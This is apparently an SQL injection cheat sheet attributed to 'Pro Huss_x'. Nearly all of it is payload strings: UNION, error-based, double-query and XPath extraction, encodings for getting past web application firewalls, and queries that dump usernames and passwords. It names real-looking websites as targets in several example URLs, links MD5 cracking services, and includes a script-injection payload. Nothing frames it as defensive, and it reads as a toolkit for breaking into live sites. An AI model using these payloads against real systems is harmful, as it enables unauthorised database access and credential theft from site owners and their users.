SQL Injection #ALL By Pro Huss_x

1.  
2. #SQL injection
3. By Pro Huss_x ++
4. ################################################################
5.  
6. ("/'/*/-)
7. ----------------------------------------------------------------
8. +having+1=1
9.  
10. ################################################################
11.  
12. +/*order*/+/*by*/+1-- -
13. ----------------------------------------------------------------
14. +order+by+100
15. ----------------------------------------------------------------
16. +Order+by+100+--+
17. ----------------------------------------------------------------
18. +Order+by+100-- -
19. ----------------------------------------------------------------
20. +Order+by+100-- _
21. ----------------------------------------------------------------
22. +Order+by+100--#
23. ----------------------------------------------------------------
24. +group+by+100-- -
25. ----------------------------------------------------------------
26. +order+by+100/*
27. ----------------------------------------------------------------
28. +order+by+100--
29.  
30. ################################################################
31.  
32. ( - ) [.php?id=-3 ]
33. ----------------------------------------------------------------
34. +union+select+
35. ----------------------------------------------------------------
36. +/**/uNIOn/**/+/**/sEleCt/**/+
37. ----------------------------------------------------------------
38. /*!50000UNION*/+/*!50000ALL*/+/*!50000SELECT*/
39. ----------------------------------------------------------------
40. +/*!12345union*/+/*!12345select*/+
41. ----------------------------------------------------------------
42. +union+distinct+select+
43. ----------------------------------------------------------------
44. +union+distinctROW+select+
45. ----------------------------------------------------------------
46. +%2F**/+Union/*!select*/
47. ----------------------------------------------------------------
48. /**//*!12345UNION SELECT*//**/
49. ----------------------------------------------------------------
50. /**//*!50000UNION SELECT*//**/
51. ----------------------------------------------------------------
52. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
53. ----------------------------------------------------------------
54. +/*!u%6eion*/+/*!se%6cect*/+
55. ----------------------------------------------------------------
56. /**/uniUNIONon/**/selSELECTect/**/
57. ----------------------------------------------------------------
58. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
59. ----------------------------------------------------------------
60. union /*!50000%53elect*/
61. ----------------------------------------------------------------
62. %55nion %53elect
63. ----------------------------------------------------------------
64. %75%6E%69%6F%6E+%73%65%6C%65%63%74
65. ----------------------------------------------------------------
66. %55nion(%53elect 1,2,3)-- -
67. ----------------------------------------------------------------
68. %a0union%a0select%09
69. ----------------------------------------------------------------
70. union/*&sort=*/select
71. ----------------------------------------------------------------
72. %0A%09UNION%0CSELECT%A0
73. ----------------------------------------------------------------
74. +%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+
75. ----------------------------------------------------------------
76. +UnIOn%0d%0aSeleCt%0d%0a1,2,3
77. ----------------------------------------------------------------
78. +union%23foo*%2F*bar%0D%0Aselect% 23foo%0D%0A1%2C2%2C1,2,3
79. ----------------------------------------------------------------
80. /*!fuckU%0d%0aunion*/+/*!fuckU%0d% 0aSelEct*/
81. ----------------------------------------------------------------
82. /**//*!union*//**//*!select*//**/
83. ----------------------------------------------------------------
84. union++++all++++select/
85. ----------------------------------------------------------------
86. php?id=1 /**/UniON/**//*50000seLect*/ 1,2,3,4,5--
87. ----------------------------------------------------------------
88. /*!union*//*--*//*!all*//*--*//*!select*/ 1,2,3,4,5,6
89. ----------------------------------------------------------------
90. /*!union*//*--*//*!all*//*--*//*!select*/ 1,2,3,4,5,6
91. ----------------------------------------------------------------
92. +Having+1=2+union+All+select+
93. ----------------------------------------------------------------
94. +union+distinct+select+
95. ----------------------------------------------------------------
96. +union+distinctROW+select
97. ----------------------------------------------------------------
98. index.php?id=(1)+union+(select+(0),(0),(0),@@versi on,(0))--+
99.  
100. ################################################################
101.  
102. version() | in linux
103. ----------------------------------------------------------------  
104. @@version  | in windwes
105. ----------------------------------------------------------------
106. database()
107. ----------------------------------------------------------------
108. user()
109. ----------------------------------------------------------------
110. @@datadir
111. ----------------------------------------------------------------
112. system_user()
113. ----------------------------------------------------------------
114. concat(user(),0x3a,version(),0x3a,database())
115.  
116. ################################################################
117.  
118. group_concat(table_name)
119. ----------------------------------------------------------------
120. gROuP_CoNcaT(TAblE_nAMe)
121. ----------------------------------------------------------------
122. +from information_schema.tables+where+table_schema=database()--
123.  
124. ################################################################
125.  
126. group_concat(column_name)
127. ----------------------------------------------------------------
128. +from information_schema.columns where table_name=0x
129. ----------------------------------------------------------------
130. http://www.waraxe.us/sql-char-encoder.html
131. ----------------------------------------------------------------
132. [id,pass,user,email]
133.  
134. ################################################################
135.  
136. group_concat(user,0x3a,pass)
137. ----------------------------------------------------------------
138. +from+users
139.  
140. ################################################################
141.  
142. Hash Md5
143.  
144. https://hashkiller.co.uk/md5-decrypter.aspx
145. ----------------------------------------------------------------
146. http://www.hashchecker.de/find.html
147.  
148. ################################################################
149.  
150. #password
151.  
152. concat(table_name,0x3e,column_name,0x3e,table_schema)
153. ----------------------------------------------------------------
154. +from+information_schema.columns+where+column_name+like+char(37, 112, 97, 115, 115, 37)--
155.  
156. #username
157.  
158. group_concat(table_Name,0x3a,column_Name)
159. ----------------------------------------------------------------
160. from+information_schema.columns+where+table+name=0x
161.  
162. ################################################################
163.  
164. +order+by+number  
165. ----------------------------------------------------------------
166. +union+select+1,2,3,4,5,6....
167. ----------------------------------------------------------------
168. concat(column_name,0x3e,table_schema,0x3e,table_name)
169. ----------------------------------------------------------------
170. +from+information_schema.columns+where+column_name+like+char(37, 112, 97, 115, 115, 37)--
171.  
172. ################################################################
173.  
174. #Not Acceptable!+forbidden
175.  
176. +/*!50000UNiON+/*!50000SeLeCt*/+
177. ----------------------------------------------------------------
178. +/*!50000Union*/+SeLEct+
179. ----------------------------------------------------------------
180. +Union+/*!50000SeLEct*/+
181. -----------------------------------------------------------------
182. /*!50000GrOuP_CoNcAT(table_name)*/
183. -----------------------------------------------------------------
184. group_concat(/*!50000table_name*/)
185. -----------------------------------------------------------------
186. +from+/*!50000information_schema*/./*!50000tables*/+where+/*!50000table_schema*/=database()-- -
187. -----------------------------------------------------------------
188. /*!50000GrOuP_CoNcAT(column_name)*/
189. -----------------------------------------------------------------
190. GrOuP_CoNcAT(/*!50000column_name*/)
191. -----------------------------------------------------------------
192. +from+/*!50000information_schema*/./*!50000columns*/+where+/*!50000table_schema*/=database()-- -
193. ----------------------------------------------------------------
194. +from+/*!50000information_schema*/./*!50000columns*/+where+/*!50000table_name*/=-- -
195. ----------------------------------------------------------------
196. /*!50000GrOuP_CoNcAT(password,0x3a,username)*/
197. ----------------------------------------------------------------
198. +from+admin-- -
199. ----------------------------------------------------------------
200. export_set(5,@:=0,(select+count()/!50000from*/+/!50000information_schema/.columns where table_schema=database() and @:=export_set(5,export_set%285,@,0x3c6c693e,/!50000column_name/,2),0x3a3a,/!50000table_name/,2)),@,2)
201.  
202. ################################################################
203.  
204. #unhex(hex(بيانات الاستعلام)))
205.  
206. ----------------------------------------------------------------
207. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3 e,table_Name)))
208. ----------------------------------------------------------------
209. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
210. ----------------------------------------------------------------
211. grOUp_ConCat(/*!TaBlE_NamE*/)
212. ----------------------------------------------------------------
213. +FrOm+InfoRmaTion_ScHEma./*!TaBleS*/
214. ----------------------------------------------------------------
215. grOUp_ConCat(/*!TaBlE_NamE*/,0x3e,/*!CoLuMn_NamE*/)
216. ----------------------------------------------------------------
217. +FrOm+InfoRmaTion_ScHEma./*!CoLuMnS*/+WheRe+/*!TaBlE_NamE*/+like+CHAR(97, 100, 109, 105, 110)
218. ----------------------------------------------------------------
219. grOUp_ConCat(/*!*/,0x3e,/*!*/)
220. ----------------------------------------------------------------
221. +FrOm+
222. ---------------#####-------------------------------------------
223.  
224. +from+information_schema . tables
225. ----------------------------------------------------------------
226. /*!12345UNION*/ /*!12345SELECT*/ /*!ALL*/
227. ----------------------------------------------------------------
228. /*!GrOuP_CoNcAT(table_name)*/
229. ----------------------------------------------------------------
230. +FROM /*!INFORMATION_SCHEMA*/./*!TABLES*/ WHERE TABLE_SCHEMA=DATABASE()-- -
231.  
232. ################################################################
233.  
234. /*!50000 */
235. /*!40000 */
236. /*!30000 */
237.  
238. /*!12345 */
239. /*!41320 */
240. /*!32302 */
241. /*!00000 */
242.  
243. /*! */
244. /**/
245. +/**/+
246.  
247. /*! GROUP_CONCAT(,0x3a,)*/
248. /*!concat_ws(0x3a,)*/
249.  
250. +union+distinct+select+
251. +union+distinctROW+select+
252.  
253. ################################################################
254.  
255. #Not Acceptable!+forbidden 2
256.  
257. ----------------------------------------------------------------
258. +/*!00000UNION*/+SELECT+
259. ----------------------------------------------------------------
260. /*!00000group_concat(table_name)*/
261. ----------------------------------------------------------------
262. +/*!00000from+information_schema.tables*/+where+table_schema=database()-- -
263. ----------------------------------------------------------------
264. /*!00000group_concat(column_name)*/
265. ----------------------------------------------------------------
266. +/*!00000from+information_schema.columns*/+where+table_name=-- -
267. ----------------------------------------------------------------
268. +/*!00000group_concat(table_Name,0x3a,column_Name)*/
269. ----------------------------------------------------------------
270. +from+admin-- -
271.  
272. ################################################################
273.  
274.  
275. =1 and 1=1
276. ----------------------------------------------------------------
277. =1 and 1=2
278.  
279. +AND MID(VERSION(),1,1) = '3';
280. ----------------------------------------------------------------
281. +AND MID(VERSION(),1,1) = '4';
282. ----------------------------------------------------------------
283. +AND MID(VERSION(),1,1) = '5';
284. ----------------------------------------------------------------
285. =-[.]1 union select 1,2,3,4,5,6,7,8,9,10,version() -- -
286. ----------------------------------------------------------------
287. version = 5.1.73-0ubuntu0.10.04.1
288.  
289. ################################################################
290.  
291. #Forbidden Hing
292.  
293. ----------------------------------------------------------------
294. current_user/**_**/()
295. ----------------------------------------------------------------
296. database/**_**/()
297. ----------------------------------------------------------------
298. div @s:=(concat(@c:=0x00,if((select count(*)/*!50000from*//*!50000information_schema*/.columns where table_schema=database/**X**/() and @c:=concat(@c, 0x3c62723e, /*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c))/*!50000union*/ select
299. ----------------------------------------------------------------
300. concat(0x3c62723e, version(), 0x203a3a20416c69204b68616e,0x3c62723e64617461626173653a20,DataBasE/**X**/(),0x3c62723e757365723a20,UsEr/**X**/(), @s)
301. ----------------------------------------------------------------
302. div @s:=((SELECT+GROUP_CONCAT(password,0x3a,username+SEPARATOR+0x3c62723e)+FROM+user)) /*!50000union*/ select
303. ----------------------------------------------------------------
304. (@s)
305. ----------------------------------------------------------------
306. %66rom
307. ----------------------------------------------------------------
308. export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns where table_schema=database() and @:=export_set(5,export_set%285,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)
309. ################################################################
310.  
311. #Boolean
312.  
313. +in+boolean+mode)+UNION+SELECT+
314.  
315. ################################################################
316.  
317. #Error Based
318.  
319. ----------------------------------------------------------------
320. or 1 group by concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2)) having min(0) or 1
321. ----------------------------------------------------------------
322. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
323. ----------------------------------------------------------------
324. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
325. ----------------------------------------------------------------
326. and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x726174696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
327. ----------------------------------------------------------------
328. and (select 1 from (select count(*),concat((select(select concat(cast(concat(mm_pwd,0x7e,mm_role) as char),0x7e)) from lpsschoo.members limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
329. ----------------------------------------------------------------#Data
330. and+extractvalue(rand(),concat(0x7e,(select+concat(mm_pwd,0x7e,mm_role)+from+members+limit+0,1)))
331. ----------------------------------------------------------------
332. +or+1+group+by+concat_ws(0x7e,(select+concat(uname,0x7e,pass)+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1-- -
333. ################################################################
334.  
335. #Fatal Error Occurred
336.  
337. null or version()
338.  
339.  
340. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,5,6--
341.  
342. http://wwfa.org.uk/article.php?id=-174 UNION SELECT null,2,3,4,5,6-- -
343.  
344. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,null,3,4,5,6-- -
345.  
346. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,null,4,5,6-- -
347.  
348. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,null,5,6-- -
349.  
350. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,null,6-- -
351.  
352. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,5,null-- -
353.  
354. or all null or version()
355.  
356. http://wwfa.org.uk/article.php?id=-174 UNION SELECT version(),version(),version(),version(),version(),version()--
357.  
358. http://wwfa.org.uk/article.php?id=-174 UNION SELECT null,null,null,null,null,null-- -
359.  
360. or
361.  
362. http://wwfa.org.uk/article.php?id=.174+and+1=2
363.  
364. http://wwfa.org.uk/article.php?id=.174+and+1=2+union+select "1' UNION SELECT+1,2,3-- -",2,3-- -
365.  
366.  
367.  
368. ################################################################
369.  
370. #illegal mix of coolation
371.  
372. ----------------------------------------------------------------
373. Illegal mix of collations for operation 'UNION'
374. ----------------------------------------------------------------
375. http://smtmax.com/category.php?id=15
376. ----------------------------------------------------------------
377. smtmax.com/category.php?id=.15 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- -
378. ----------------------------------------------------------------
379. group_concat(table_name)
380. ----------------------------------------------------------------
381. +From+InfORmaTion_schema.+tAblES+Where+table_ScHEmA=schEMA()-- -
382. ------------------########-------------------------------------
383.  
384. convert(group_concat(table_name) using ascii)
385. ----------------------------------------------------------------
386. unhex(hex(group_concat(table_name)))
387. ----------------------------------------------------------------
388. convert(value using xxxx)
389. ----------------------------------------------------------------
390. unhex(hex(value))
391. ----------------------------------------------------------------
392. cast(value as char)
393. ----------------------------------------------------------------
394. uncompress(compress(version()))
395. ----------------------------------------------------------------
396. cast(value as char)
397. ----------------------------------------------------------------
398. aes_decrypt(aes_encrypt(value,1),1)
399. ----------------------------------------------------------------
400. binary(value)
401. ----------------------------------------------------------------
402. ascii
403. ujis
404. ucs2
405. tis620
406. swe7
407. sjis
408. macroman
409. macce
410. latin7
411. latin5
412. latin2
413. koi8u
414. koi8r
415. keybcs2
416. hp8
417. geostd8
418. gbk
419. gb2132
420. armscii8
421. ascii
422. cp1250
423. big5
424. cp1251
425. cp1256
426. cp1257
427. cp850
428. cp852
429. cp866
430. cp932
431. dec8
432. euckr
433. latin1
434. utf8
435.  
436. ################################################################
437.  
438. #nember table :
439.  
440. id=vv()
441. id=@10
442. id==10
443. =10=10
444. id=.10
445. id=-10
446. &id=polygon(10)
447. id=null
448. id=9999
449. id=999999.9
450. id=(-10)
451. id=10+and+false+
452. id=10 and 0
453. id=10 dev 0
454. ----------------------------------------------------------------
455. +And+1=2
456. and (1)!=(0)
457. +and(1)=(0)
458. +and+2>3+
459. /*!aND*/ 1 like 0
460. +where+1=2
461. /*!and*/+1=0
462. /*!and*/+1=0
463. ---------------------------------------------------------------------------------------------------------------
464. 2-search for vulnerable column (like 11111) in source code.
465.  
466. +/*!12345union*/+select+1111,2222,3333,4444--+
467. ---------------------------------------------------------------------------------------------------------------
468. 3-put null to all columns and then starting with column ,replace single null to some number (one in a time).
469.  
470. +/*!12345union*/+select+null,null,null,null--+
471. ---------------------------------------------------------------------------------------------------------------
472. 4-add version() in all columns.
473.  
474. +/*!12345union*/+select+version(),version(),version(),version()--+
475. ---------------------------------------------------------------------------------------------------------------
476. 5-Brute Forcing COlumns In SQLi By Check Every Column.
477.  
478. +/*!12345union*/+select+1111--+
479. +/*!12345union*/+select+1111,2222--+
480. +/*!12345union*/+select+1111,2222,3333--+
481. +/*!12345union*/+select+1111,2222,3333,4444--+
482. ---------------------------------------------------------------------------------------------------------------
483. 6-check for routed query.
484.  
485. ' and 0 Union SeLEct 1,"2' and 0 Union SeLEct 1,2,3,version(),5,6,7,8,9-- -",3,4,5,6,7,8,9-- -
486. ---------------------------------------------------------------------------------------------------------------
487. 7-check for injection inside injection.
488.  
489. '*2e9unioN Select!1,2,3,4,5,0x6c656c276f72646572206279203123%23
490. ---------------------------------------------------------------------------------------------------------------
491. 8-check commenting out remaining query at the end for your injection.
492.  
493. | --+ | --+- | +--+ | -- - | ` | ;-- - | " | %23 | %60 | ;%00 |%2523 | %2560 | ;%2500 | 0%0a) | // | /**/ | /* | # | / | ) | )' |
494.  
495. ################################################################
496.  
497. #Xpath UpdateXML 1
498.  
499.  
500. ## version ##
501.  
502. +and+extractvalue(rand(),concat(0x7e,version()))-- -
503.  
504. ## Tables :
505.  
506. +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- -
507.  
508. ## column :
509.  
510. +and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=TABLE_HEX+limit+0,1)))-- -
511.  
512. http://www.waraxe.us/sql-char-encoder.html  
513.  
514. ## Data :
515.  
516. +and+extractvalue(rand(),concat(0x7e,(select+concat(column1,0x7e,column2)+from+table+limit+0,1)))-- -
517.  
518. ################################################################
519.  
520. #Xpath UpdateXML 2
521.  
522.  
523. ## Version ##
524.  
525. +and+updatexml(0x7e,concat(0x7e,(version())),0)--
526. +and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/ version()),0x7e),1)
527.  
528. ## Getting The Tables (UpdateXML)
529.  
530. +and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_sch​ema.tables+where+table_schema=database()+limit+0,1))),0)--
531.  
532. ##  Getting Columns (UpdateXML)
533.  
534. +and+updatexml(0x7e,concat(0x7e,((select+concat(column_name)+from+information_sc​hema.columns+where+table_name=0xTABLE_HEX+limit+0,1))),0)--
535.  
536. ##  Getting Data (UpdateXML)
537.  
538. +and+updatexml(0x7e,concat(0x7e,((select+concat(column1,0x7e​,column2)+from+TABLENAME+limit+0,1))),0)--
539.  
540. ################################################################
541.  
542. #move injection
543.  
544. concat('</title><script>alert("',SQLI,'")</script>')
545.  
546. ################################################################
547.  
548. #xtype=char85
549.  
550.  
551. # DB #
552.  
553. +or 1=convert(int,(DB_NAME()))--
554.  
555. # table_name #
556.  
557. +or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))--
558.  
559. and name!='TABLE-NAME-1'
560.  
561. # column_name #
562.  
563. +or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))--
564.  
565. and column_name!='COLUMN-NAME-1'
566.  
567. # data #
568.  
569. +or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))--
570.  
571. +or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE') order by COLUMN-NAME-1 desc))--
572.  
573. ################################################################
574.  
575. #DOUBLE Query Injection's
576.  
577. #version
578.  
579. +and(select 1 from(select count(*),concat((select (select concat(version())) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
580.  
581. ## Getting The DataBase  ##
582.  
583. +and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
584.  
585. ## Getting The Tables  ##
586.  
587. +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(table_name),0x27,0x7e) from information_schema.tables where table_schema=hex-database limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
588.  
589. ## Getting The Columns  ##
590.  
591. +and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns+Where+table_schema=hex-database AND table_name=hex-table LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
592.  
593. ## Dump Data  ##
594.  
595. +and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e,cast(table_name.column_name as char)) FROM `database_name`.table_name LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
596.  
597. ################################################################
598.  
599. #The connection was reset
600.  
601. http://www.avt.sd/mpage.php?id=2-.1union select 1,2,3,4,5,6,7,8,9,10
602.  
603. ?id=2-
604.  
605. ?id=2-.1
606.  
607. ?id=2-.1union select
608.  
609. ################################################################
610.  
611. #union based in windoes
612.  
613. # EXTRACT DATABASE USER #
614.  
615. USER - DB_NAME - @@VERSION - @@SERVERNAME - db_name()
616. ---------------------------------------------------------------------------------------------------------------
617. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,db_name(),3--
618. ---------------------------------------------------------------------------------------------------------------
619. #db_table
620.  
621. schema_name
622.  
623. +from information Schema.schemata-- -
624.  
625. id=-174 UNION SELECT 1,schema_name,3+from information Schema.schemata-- -
626. ---------------------------------------------------------------------------------------------------------------
627. # table_name #
628.  
629. table_name
630.  
631. from information Schema.table_shema!=db_name-- -
632.  
633. id=-174 UNION SELECT 1,table_name,3+from information Schema.table_shema!=db_name-- -
634. ---------------------------------------------------------------------------------------------------------------
635. # column_name #
636.  
637. column_name
638.  
639. +from DBNAME.information_schema.columns where table_name='o_admin'--
640.  
641. id=-174 UNION SELECT 1,column_name,3+from DBNAME.information_schema.columns where table_name='o_admin'--
642. ---------------------------------------------------------------------------------------------------------------
643. #Data
644.  
645. id=-174 UNION SELECT 1,password,3+from+o_admin--
646.  
647. ################################################################